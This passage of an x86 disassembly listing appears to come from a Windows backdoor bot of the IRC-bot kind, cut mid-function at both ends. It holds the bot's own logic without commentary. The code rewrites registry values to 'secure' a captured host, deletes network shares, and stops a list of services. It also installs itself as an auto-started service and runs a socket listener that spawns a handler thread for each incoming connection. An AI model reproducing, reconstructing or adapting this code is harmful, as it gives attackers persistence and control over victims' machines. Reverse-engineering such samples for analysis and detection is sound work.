push [ebp+var_60]
call sub_42355A
pop ecx
push esi
call dword_437170 ; ExitThread
loc_421762: ; CODE XREF: sub_4216DB+75�j
; sub_4216DB+A6�j
lea eax, [ebp+var_20]
push esi
push eax
push edi
call dword_456FC4 ; accept
lea ecx, [ebp+arg_0]
push ecx
push esi
push eax
push offset sub_4215AD
push esi
push esi
call dword_43717C ; CreateThread
jmp short loc_421762
sub_4216DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421783 proc near ; CODE XREF: sub_421F40+43�p
; sub_421F40+9F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor edx, edx
push esi
push edi
mov [ebp+var_8], edx
mov [ebp+var_4], edx
xor esi, esi
loc_421795: ; CODE XREF: sub_421783+23E�j
mov eax, dword_44E16C[esi]
cmp eax, 4
jnz loc_4218AC
cmp [ebp+arg_0], edx
jz short loc_4217B1
mov eax, dword_44E170[esi]
jmp short loc_4217B7
; ---------------------------------------------------------------------------
loc_4217B1: ; CODE XREF: sub_421783+24�j
mov eax, dword_44E174[esi]
loc_4217B7: ; CODE XREF: sub_421783+2C�j
lea edi, dword_44E06B[esi]
lea ebx, dword_44DF6C[esi]
push eax
push edi
push ebx
push dword_44DF68[esi]
call sub_42131F
add esp, 10h
test eax, eax
jz short loc_421842
inc [ebp+var_8]
cmp [ebp+arg_14], 0
jnz loc_4219B3
cmp [ebp+arg_10], 0
jz loc_4219B3
cmp [ebp+arg_C], 0
jnz loc_4219B3
cmp [ebp+arg_0], 0
jz short loc_421807
mov ecx, dword_44E170[esi]
jmp short loc_42180D
; ---------------------------------------------------------------------------
loc_421807: ; CODE XREF: sub_421783+7A�j
mov ecx, dword_44E174[esi]
loc_42180D: ; CODE XREF: sub_421783+82�j
cmp dword_44DF68[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_421823
mov edx, offset aHkcu ; "HKCU"
loc_421823: ; CODE XREF: sub_421783+99�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_421833
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421833: ; CODE XREF: sub_421783+A9�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSSetSSSToD_ ; "%s Set \"%s\\%s\\%s\" to \"%d\"."
jmp loc_4219A5
; ---------------------------------------------------------------------------
loc_421842: ; CODE XREF: sub_421783+53�j
inc [ebp+var_4]
cmp [ebp+arg_14], 0
jnz loc_4219B3
cmp [ebp+arg_10], 0
jz loc_4219B3
cmp [ebp+arg_C], 0
jnz loc_4219B3
cmp [ebp+arg_0], 0
jz short loc_421871
mov ecx, dword_44E170[esi]
jmp short loc_421877
; ---------------------------------------------------------------------------
loc_421871: ; CODE XREF: sub_421783+E4�j
mov ecx, dword_44E174[esi]
loc_421877: ; CODE XREF: sub_421783+EC�j
cmp dword_44DF68[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_42188D
mov edx, offset aHkcu ; "HKCU"
loc_42188D: ; CODE XREF: sub_421783+103�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_42189D
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_42189D: ; CODE XREF: sub_421783+113�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSFailedToSetSS ; "%s Failed to set \"%s\\%s\\%s\" to \"%d\"."
jmp loc_4219A5
; ---------------------------------------------------------------------------
loc_4218AC: ; CODE XREF: sub_421783+1B�j
cmp eax, 1
jnz loc_4219B5
inc [ebp+var_8]
cmp [ebp+arg_0], edx
lea eax, dword_44E178[esi]
jnz short loc_4218C9
lea eax, dword_44E277[esi]
loc_4218C9: ; CODE XREF: sub_421783+13E�j
lea edi, dword_44E06B[esi]
push 1
lea ebx, dword_44DF6C[esi]
push eax
push edi
push ebx
push dword_44DF68[esi]
call sub_421340
add esp, 14h
test eax, eax
jz short loc_42194E
cmp [ebp+arg_14], 0
jnz loc_4219B3
cmp [ebp+arg_10], 0
jz loc_4219B3
cmp [ebp+arg_C], 0
jnz loc_4219B3
cmp [ebp+arg_0], 0
lea ecx, dword_44E178[esi]
jnz short loc_42191C
lea ecx, dword_44E277[esi]
loc_42191C: ; CODE XREF: sub_421783+191�j
cmp dword_44DF68[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_421932
mov edx, offset aHkcu ; "HKCU"
loc_421932: ; CODE XREF: sub_421783+1A8�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_421942
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421942: ; CODE XREF: sub_421783+1B8�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSSetSSSToS_ ; "%s Set \"%s\\%s\\%s\" to \"%s\"."
jmp short loc_4219A5
; ---------------------------------------------------------------------------
loc_42194E: ; CODE XREF: sub_421783+167�j
inc [ebp+var_4]
cmp [ebp+arg_14], 0
jnz short loc_4219B3
cmp [ebp+arg_10], 0
jz short loc_4219B3
cmp [ebp+arg_C], 0
jnz short loc_4219B3
cmp [ebp+arg_0], 0
lea ecx, dword_44E178[esi]
jnz short loc_421975
lea ecx, dword_44E277[esi]
loc_421975: ; CODE XREF: sub_421783+1EA�j
cmp dword_44DF68[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_42198B
mov edx, offset aHkcu ; "HKCU"
loc_42198B: ; CODE XREF: sub_421783+201�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_42199B
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_42199B: ; CODE XREF: sub_421783+211�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSFailedToSet_0 ; "%s Failed to set \"%s\\%s\\%s\" to \"%s\"."
loc_4219A5: ; CODE XREF: sub_421783+BA�j
; sub_421783+124�j ...
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CD84
add esp, 20h
loc_4219B3: ; CODE XREF: sub_421783+5C�j
; sub_421783+66�j ...
xor edx, edx
loc_4219B5: ; CODE XREF: sub_421783+12C�j
add esi, 410h
cmp esi, 0C30h
jb loc_421795
cmp [ebp+var_8], edx
pop edi
pop esi
pop ebx
jnz short loc_421A06
cmp [ebp+arg_10], edx
jnz short locret_421A44
cmp [ebp+arg_C], edx
jnz short locret_421A44
cmp [ebp+arg_14], edx
jnz short locret_421A44
cmp [ebp+arg_0], edx
mov ecx, offset aSecured ; "Secured"
jnz short loc_4219FF
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_4219F2: ; CODE XREF: sub_421783+281�j
push [ebp+var_4]
push edx
push ecx
push eax
push offset aSFailedToSRegi ; "%s Failed to %s Registry, (%.2d/%.2d)"
jmp short loc_421A36
; ---------------------------------------------------------------------------
loc_4219FF: ; CODE XREF: sub_421783+263�j
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp short loc_4219F2
; ---------------------------------------------------------------------------
loc_421A06: ; CODE XREF: sub_421783+24A�j
cmp [ebp+arg_10], edx
jnz short locret_421A44
cmp [ebp+arg_C], edx
jnz short locret_421A44
cmp [ebp+arg_14], edx
jnz short locret_421A44
cmp [ebp+arg_0], edx
mov ecx, offset aSecure ; "Secure"
jnz short loc_421A46
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421A29: ; CODE XREF: sub_421783+2C8�j
push [ebp+var_4]
push [ebp+var_8]
push ecx
push eax
push offset aSRegistryS_2d_ ; "%s Registry %s, (%.2d/%.2d)"
loc_421A36: ; CODE XREF: sub_421783+27A�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CD84
add esp, 1Ch
locret_421A44: ; CODE XREF: sub_421783+24F�j
; sub_421783+254�j ...
leave
retn
; ---------------------------------------------------------------------------
loc_421A46: ; CODE XREF: sub_421783+29A�j
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp short loc_421A29
sub_421783 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421A4D proc near ; CODE XREF: sub_421F40+4E�p
; sub_421F40+B6�p
var_4E54 = byte ptr -4E54h
var_2744 = byte ptr -2744h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 4E54h
call sub_429A90
push ebx
xor ebx, ebx
cmp [ebp+arg_0], ebx
push esi
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
jz loc_421C88
cmp [ebp+arg_14], ebx
mov [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_421A9F
cmp [ebp+arg_C], ebx
jnz short loc_421A9F
push offset aErased ; "erased"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
lea eax, [ebp+var_2744]
push offset dword_44F104
push eax
call sub_429A33
add esp, 10h
loc_421A9F: ; CODE XREF: sub_421A4D+2D�j
; sub_421A4D+32�j ...
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push ebx
call dword_456E20
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_421B4A
cmp eax, 0EAh
jz short loc_421B4A
xor esi, esi
loc_421AD1: ; CODE XREF: sub_421A4D+F6�j
push ebx
push off_44EB98[esi]
push ebx
call dword_456D9C
test eax, eax
jnz short loc_421B3A
cmp [ebp+arg_14], ebx
jnz short loc_421B37
cmp [ebp+arg_C], ebx
jnz short loc_421B37
cmp [ebp+arg_10], ebx
jz short loc_421B37
cmp [ebp+var_4], ebx
jle short loc_421B0A
lea eax, [ebp+var_2744]
push offset dword_44F100
push eax
call sub_42A510
pop ecx
pop ecx
loc_421B0A: ; CODE XREF: sub_421A4D+A8�j
push off_44EB98[esi]
lea eax, [ebp+var_4E54]
push offset off_44F0FC
push eax
call sub_429A33
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A510
add esp, 14h
loc_421B37: ; CODE XREF: sub_421A4D+99�j
; sub_421A4D+9E�j ...
inc [ebp+var_4]
loc_421B3A: ; CODE XREF: sub_421A4D+94�j
add esi, 8
cmp esi, 138h
jb short loc_421AD1
jmp loc_421BDC
; ---------------------------------------------------------------------------
loc_421B4A: ; CODE XREF: sub_421A4D+75�j
; sub_421A4D+80�j
mov edi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+arg_0], ebx
jb short loc_421BD1
loc_421B55: ; CODE XREF: sub_421A4D+182�j
mov esi, [edi]
push esi
call sub_42A937
cmp word ptr [esi+eax*2-2], 24h
pop ecx
jnz short loc_421BC8
push 0
push esi
push 0
call dword_456D9C
test eax, eax
jnz short loc_421BC8
cmp [ebp+arg_14], eax
jnz short loc_421BC5
cmp [ebp+arg_C], eax
jnz short loc_421BC5
cmp [ebp+arg_10], eax
jz short loc_421BC5
cmp [ebp+var_4], eax
jle short loc_421B9C
lea eax, [ebp+var_2744]
push offset dword_44F100
push eax
call sub_42A510
pop ecx
pop ecx
loc_421B9C: ; CODE XREF: sub_421A4D+13A�j
push dword ptr [edi]
lea eax, [ebp+var_4E54]
push offset off_44F0FC
push eax
call sub_429A33
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A510
add esp, 14h
loc_421BC5: ; CODE XREF: sub_421A4D+12B�j
; sub_421A4D+130�j ...
inc [ebp+var_4]
loc_421BC8: ; CODE XREF: sub_421A4D+117�j
; sub_421A4D+126�j
add edi, 28h
inc ebx
cmp ebx, [ebp+arg_0]
jbe short loc_421B55
loc_421BD1: ; CODE XREF: sub_421A4D+106�j
push [ebp+var_8]
call dword_456FC0
xor ebx, ebx
loc_421BDC: ; CODE XREF: sub_421A4D+F8�j
cmp [ebp+var_14], 0EAh
jz loc_421A9F
cmp [ebp+arg_10], ebx
jz short loc_421C5A
cmp [ebp+arg_14], ebx
jnz loc_421DC5
cmp [ebp+arg_C], ebx
jnz loc_421DC5
cmp [ebp+var_4], ebx
jnz short loc_421C14
loc_421C05: ; CODE XREF: sub_421A4D+222�j
push offset aErased ; "erased"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp loc_421D77
; ---------------------------------------------------------------------------
loc_421C14: ; CODE XREF: sub_421A4D+1B6�j
push [ebp+var_4]
push offset aErased ; "erased"
push offset aTotalSharesSD ; " Total shares: [%s: %d]"
loc_421C21: ; CODE XREF: sub_421A4D+348�j
lea eax, [ebp+var_4E54]
push eax
call sub_429A33
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A510
lea eax, [ebp+var_2744]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CD84
add esp, 24h
jmp loc_421DC5
; ---------------------------------------------------------------------------
loc_421C5A: ; CODE XREF: sub_421A4D+19F�j
cmp [ebp+arg_14], ebx
jnz loc_421DC5
cmp [ebp+arg_C], ebx
jnz loc_421DC5
cmp [ebp+var_4], ebx
jz short loc_421C05
push [ebp+var_4]
push offset aErased ; "erased"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push offset aSTotalSharesSD ; "%s Total shares %s: [%d]"
jmp loc_421DB7
; ---------------------------------------------------------------------------
loc_421C88: ; CODE XREF: sub_421A4D+1B�j
cmp [ebp+arg_14], ebx
mov edi, offset aCreated ; "created"
jnz short loc_421CB1
cmp [ebp+arg_C], ebx
jnz short loc_421CB1
push edi
push offset aJvatg1988z81 ; "jVATg1988z81"
lea eax, [ebp+var_2744]
push offset dword_44F104
push eax
call sub_429A33
add esp, 10h
loc_421CB1: ; CODE XREF: sub_421A4D+243�j
; sub_421A4D+248�j
mov [ebp+arg_0], ebx
xor esi, esi
loc_421CB6: ; CODE XREF: sub_421A4D+30A�j
mov eax, off_44EB98[esi]
mov [ebp+var_30], ebx
mov [ebp+var_34], eax
mov eax, dword_44EB9C[esi]
mov [ebp+var_1C], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_34]
push eax
push 2
push ebx
mov [ebp+var_2C], offset aUnloading ; "Unloading"
mov [ebp+var_28], ebx
mov [ebp+var_24], 4
mov [ebp+var_20], ebx
mov [ebp+var_18], ebx
call dword_456DC0
test eax, eax
jnz short loc_421D4E
cmp [ebp+arg_14], ebx
jnz short loc_421D4B
cmp [ebp+arg_C], ebx
jnz short loc_421D4B
cmp [ebp+arg_10], ebx
jz short loc_421D4B
cmp [ebp+var_8], ebx
jle short loc_421D1E
lea eax, [ebp+var_2744]
push offset dword_44F100
push eax
call sub_42A510
pop ecx
pop ecx
loc_421D1E: ; CODE XREF: sub_421A4D+2BC�j
push off_44EB98[esi]
lea eax, [ebp+var_4E54]
push offset off_44F0FC
push eax
call sub_429A33
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A510
add esp, 14h
loc_421D4B: ; CODE XREF: sub_421A4D+2AD�j
; sub_421A4D+2B2�j ...
inc [ebp+var_8]
loc_421D4E: ; CODE XREF: sub_421A4D+2A8�j
add esi, 8
cmp esi, 138h
jb loc_421CB6
cmp [ebp+arg_10], ebx
jz short loc_421D9A
cmp [ebp+arg_14], ebx
jnz short loc_421DC5
cmp [ebp+arg_C], ebx
jnz short loc_421DC5
cmp [ebp+var_8], ebx
jnz short loc_421D8C
loc_421D71: ; CODE XREF: sub_421A4D+35A�j
push edi
push offset aJvatg1988z81 ; "jVATg1988z81"
loc_421D77: ; CODE XREF: sub_421A4D+1C2�j
push offset aSNoSharesS_ ; "%s No shares %s."
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CD84
add esp, 14h
jmp short loc_421DC5
; ---------------------------------------------------------------------------
loc_421D8C: ; CODE XREF: sub_421A4D+322�j
push [ebp+var_8]
push edi
push offset aTotalSharesS_0 ; " Total shares [%s: %d]"
jmp loc_421C21
; ---------------------------------------------------------------------------
loc_421D9A: ; CODE XREF: sub_421A4D+313�j
cmp [ebp+arg_C], ebx
jnz short loc_421DC5
cmp [ebp+arg_14], ebx
jnz short loc_421DC5
cmp [ebp+var_8], ebx
jz short loc_421D71
push [ebp+var_8]
push edi
push offset aJvatg1988z81 ; "jVATg1988z81"
push offset aSTotalShares_0 ; "%s Total shares [%s: %d]"
loc_421DB7: ; CODE XREF: sub_421A4D+236�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CD84
add esp, 18h
loc_421DC5: ; CODE XREF: sub_421A4D+1A4�j
; sub_421A4D+1AD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_421A4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421DCA proc near ; CODE XREF: sub_421F40+38�p
; sub_421F40+85�p
var_24 = byte ptr -24h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
xor edi, edi
mov [ebp+var_4], edi
mov esi, offset aFfec81uznt81 ; "fFEC81UzNT81"
loc_421DDD: ; CODE XREF: sub_421DCA+119�j
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push 0
call dword_456F08 ; OpenSCManagerA
push 0F01FFh
mov [ebp+var_8], eax
push off_44DF48[edi]
push eax
call dword_456DA8 ; OpenServiceA
mov ebx, eax
test ebx, ebx
jnz short loc_421E46
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 424h
jnz loc_421ECD
xor eax, eax
cmp [ebp+arg_C], eax
jz loc_421ECD
cmp [ebp+arg_10], eax
jnz loc_421ECD
cmp [ebp+arg_8], eax
jnz loc_421ECD
push off_44DF58[edi]
push esi
push offset aSTheSServiceDo ; "%s The %s service does not exist."
jmp short loc_421EBF
; ---------------------------------------------------------------------------
loc_421E46: ; CODE XREF: sub_421DCA+3E�j
lea eax, [ebp+var_24]
push eax
push 1
push ebx
call dword_456E24 ; ControlService
test eax, eax
jz short loc_421E94
lea eax, [ebp+var_24]
push eax
push 1
push ebx
call dword_456E24 ; ControlService
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_421E8F
cmp [ebp+arg_10], eax
jnz short loc_421E8F
cmp [ebp+arg_8], eax
jnz short loc_421E8F
push off_44DF58[edi]
push esi
push offset aSSServiceStopp ; "%s %s service stopped."
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CD84
add esp, 14h
loc_421E8F: ; CODE XREF: sub_421DCA+9F�j
; sub_421DCA+A4�j ...
inc [ebp+var_4]
jmp short loc_421ECD
; ---------------------------------------------------------------------------
loc_421E94: ; CODE XREF: sub_421DCA+8B�j
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 426h
jnz short loc_421ECD
cmp [ebp+arg_C], 0
jz short loc_421ECD
cmp [ebp+arg_10], 0
jnz short loc_421ECD
cmp [ebp+arg_8], 0
jnz short loc_421ECD
push off_44DF58[edi]
push esi
push offset aSTheSServiceWa ; "%s The %s service was not started."
loc_421EBF: ; CODE XREF: sub_421DCA+7A�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CD84
add esp, 14h
loc_421ECD: ; CODE XREF: sub_421DCA+4B�j
; sub_421DCA+56�j ...
push ebx
call dword_456DC4 ; CloseServiceHandle
push [ebp+var_8]
call dword_456DC4 ; CloseServiceHandle
add edi, 4
cmp edi, 10h
jl loc_421DDD
xor eax, eax
cmp [ebp+var_4], eax
jnz short loc_421F15
cmp [ebp+arg_10], eax
jnz short loc_421F3B
cmp [ebp+arg_8], eax
jnz short loc_421F3B
cmp [ebp+arg_C], eax
jnz short loc_421F3B
push esi
push offset aSNoServicesSto ; "%s No services stopped."
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
jmp short loc_421F3B
; ---------------------------------------------------------------------------
loc_421F15: ; CODE XREF: sub_421DCA+124�j
cmp [ebp+arg_10], eax
jnz short loc_421F3B
cmp [ebp+arg_8], eax
jnz short loc_421F3B
cmp [ebp+arg_C], eax
jnz short loc_421F3B
push [ebp+var_4]
push esi
push offset aSTotalServices ; "%s Total services stopped: %d"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CD84
add esp, 14h
loc_421F3B: ; CODE XREF: sub_421DCA+129�j
; sub_421DCA+12E�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_421DCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421F40 proc near ; DATA XREF: sub_40A938+ADB�o
; sub_40A938+9E77�o ...
var_C4 = dword ptr -0C4h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0C4h
mov eax, [ebp+arg_0]
push esi
push edi
push 31h
pop ecx
mov esi, eax
lea edi, [ebp+var_C4]
rep movsd
xor edi, edi
xor esi, esi
inc edi
cmp [ebp+var_2C], esi
mov [eax+0BCh], edi
jz short loc_421FA3
loc_421F6B: ; CODE XREF: sub_421F40+61�j
cmp dword_457014, esi
jnz short loc_421F96
push edi
push esi
push edi
push esi
push esi
call sub_421DCA
push edi
push esi
push edi
push esi
push esi
push edi
call sub_421783
push edi
push esi
push edi
push esi
push esi
push edi
call sub_421A4D
add esp, 44h
loc_421F96: ; CODE XREF: sub_421F40+31�j
push 0C3500h
call dword_43718C ; Sleep
jmp short loc_421F6B
; ---------------------------------------------------------------------------
loc_421FA3: ; CODE XREF: sub_421F40+29�j
cmp dword_457014, esi
mov edi, [ebp+var_C4]
jnz short loc_421FFE
cmp [ebp+var_30], esi
jz short loc_421FCD
push esi
lea eax, [ebp+var_C0]
push [ebp+var_14]
push [ebp+var_10]
push eax
push edi
call sub_421DCA
add esp, 14h
loc_421FCD: ; CODE XREF: sub_421F40+74�j
push esi
lea eax, [ebp+var_C0]
push [ebp+var_14]
push [ebp+var_10]
push eax
push edi
push [ebp+var_30]
call sub_421783
push esi
lea eax, [ebp+var_C0]
push [ebp+var_14]
push [ebp+var_10]
push eax
push edi
push [ebp+var_30]
call sub_421A4D
add esp, 30h
loc_421FFE: ; CODE XREF: sub_421F40+6F�j
push [ebp+var_40]
call sub_42355A
pop ecx
push esi
call dword_437170 ; ExitThread
pop edi
pop esi
loc_422010: ; DATA XREF: sub_42207E+12�o
cmp [esp+0C8h+var_C4], 5
push esi
jnz short loc_42205F
mov esi, offset dword_457DFC
mov ecx, esi
call sub_41DA9A
test al, al
jz short loc_422055
push offset aSystemShutting ; "System shutting down."
push esi
call sub_41C9EE
pop ecx
pop ecx
push 3E8h
call dword_43718C ; Sleep
mov ecx, esi
call sub_41C9BC
call dword_456E38 ; WSACleanup
push 0
call dword_4370C4 ; ExitProcess
loc_422055: ; CODE XREF: sub_421F40+E6�j
mov dword_46AFD8, 7
loc_42205F: ; CODE XREF: sub_421F40+D6�j
push offset dword_46AFD4
push dword_46AFD0
call dword_456E50 ; SetServiceStatus
test eax, eax
jnz short loc_42207A
call dword_43716C ; RtlGetLastWin32Error
loc_42207A: ; CODE XREF: sub_421F40+132�j
pop esi
retn 4
sub_421F40 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42207E proc near ; DATA XREF: sub_418D49+8B�o
var_4 = byte ptr -4
push ecx
push esi
push edi
push 4
xor esi, esi
pop edi
mov dword_46AFD4, 30h
push offset loc_422010
push offset dword_4439B0
mov dword_46AFD8, 2
mov dword_46AFDC, edi
mov dword_46AFE0, esi
mov dword_46AFE4, esi
mov dword_46AFE8, esi
mov dword_46AFEC, esi
call dword_456F30 ; RegisterServiceCtrlHandlerA
push offset dword_46AFD4
push eax
mov dword_46AFD0, eax
mov dword_46AFD8, edi
mov dword_46AFE8, esi
mov dword_46AFEC, esi
call dword_456E50 ; SetServiceStatus
lea eax, [esp+0Ch+var_4]
push eax
push esi
push esi
push offset sub_42222E
push esi
push esi
call dword_43717C ; CreateThread
mov edi, eax
cmp edi, esi
jz short loc_422115
push 0FFFFFFFFh
push edi
call dword_43707C ; WaitForSingleObject
push edi
call dword_437044 ; CloseHandle
loc_422115: ; CODE XREF: sub_42207E+85�j
pop edi
xor eax, eax
pop esi
pop ecx
retn
sub_42207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42211B proc near ; CODE XREF: sub_418D49+160�p
; sub_418D49+185�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_104]
push offset aS_4 ; "\"%s\""
push eax
call sub_429A33
add esp, 0Ch
xor esi, esi
push 2
push esi
push esi
call dword_456F08 ; OpenSCManagerA
cmp eax, esi
mov dword_46AFCC, eax
jnz short loc_42215B
push [ebp+arg_0]
call sub_422394
pop ecx
loc_42215B: ; CODE XREF: sub_42211B+35�j
push esi
push esi
push esi
push esi
lea eax, [ebp+var_104]
push esi
push eax
push esi
push 2
push 110h
push 0F01FFh
push offset dword_4439CC
push offset dword_4439B0
push dword_46AFCC
call dword_456F98 ; CreateServiceA
mov edi, eax
cmp edi, esi
jnz short loc_4221AF
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 436h
jz short loc_4221BA
cmp eax, 431h
jz short loc_4221BA
push [ebp+arg_0]
call sub_422394
pop ecx
jmp short loc_4221BF
; ---------------------------------------------------------------------------
loc_4221AF: ; CODE XREF: sub_42211B+73�j
push offset loc_4439E8
call sub_42226C
pop ecx
loc_4221BA: ; CODE XREF: sub_42211B+80�j
; sub_42211B+87�j
call sub_4221D8
loc_4221BF: ; CODE XREF: sub_42211B+92�j
push edi
call dword_456DC4 ; CloseServiceHandle
push dword_46AFCC
call dword_456DC4 ; CloseServiceHandle
pop edi
xor eax, eax
pop esi
leave
retn
sub_42211B endp
; =============== S U B R O U T I N E =======================================
sub_4221D8 proc near ; CODE XREF: sub_42211B:loc_4221BA�p
push esi
push 0F003Fh
push 0
push 0
call dword_456F08 ; OpenSCManagerA
test eax, eax
mov dword_46AFCC, eax
jz short loc_42222A
push 0F01FFh
push offset dword_4439B0
push eax
call dword_456DA8 ; OpenServiceA
mov esi, eax
test esi, esi
jz short loc_42222A
push 0
push 0
push esi
call dword_456DB0 ; StartServiceA
test eax, eax
jz short loc_42222A
push dword_46AFCC
call dword_456DC4 ; CloseServiceHandle
push esi
call dword_456DC4 ; CloseServiceHandle
loc_42222A: ; CODE XREF: sub_4221D8+17�j
; sub_4221D8+2E�j ...
xor eax, eax
pop esi
retn
sub_4221D8 endp
; =============== S U B R O U T I N E =======================================
sub_42222E proc near ; DATA XREF: sub_42207E+74�o
var_4 = byte ptr -4
push ecx
push esi
push edi
lea eax, [esp+0Ch+var_4]
xor edi, edi
push eax
push edi
push edi
push offset sub_418EDB
push edi
push edi
call dword_43717C ; CreateThread
mov esi, eax
cmp esi, edi
jnz short loc_422255
pop edi
xor eax, eax
pop esi
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_422255: ; CODE XREF: sub_42222E+1D�j
push 0FFFFFFFFh
push esi
call dword_43707C ; WaitForSingleObject
push esi
call dword_437044 ; CloseHandle
push edi
call dword_437170 ; ExitThread
sub_42222E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42226C proc near ; CODE XREF: sub_42211B+99�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push 0F003Fh
inc edi
push ebx
push ebx
mov [ebp+var_8], edi
call dword_456F08 ; OpenSCManagerA
cmp eax, ebx
mov dword_46AFCC, eax
jz short loc_4222F7
mov esi, offset dword_4439B0
push 0F01FFh
push esi
push eax
call dword_456DA8 ; OpenServiceA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_4222F7
push dword_46AFCC
call dword_456DE0 ; LockServiceDatabase
cmp eax, ebx
mov [ebp+var_14], eax
jnz short loc_422309
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 41Fh
jnz short loc_4222F7
mov ebx, 10Ch
push ebx
push 40h
call dword_437124 ; LocalAlloc
test eax, eax
mov [ebp+var_C], eax
jz short loc_4222F7
lea ecx, [ebp+var_18]
push ecx
push ebx
push eax
push dword_46AFCC
call dword_456E68 ; QueryServiceLockStatusA
test eax, eax
jnz short loc_4222FE
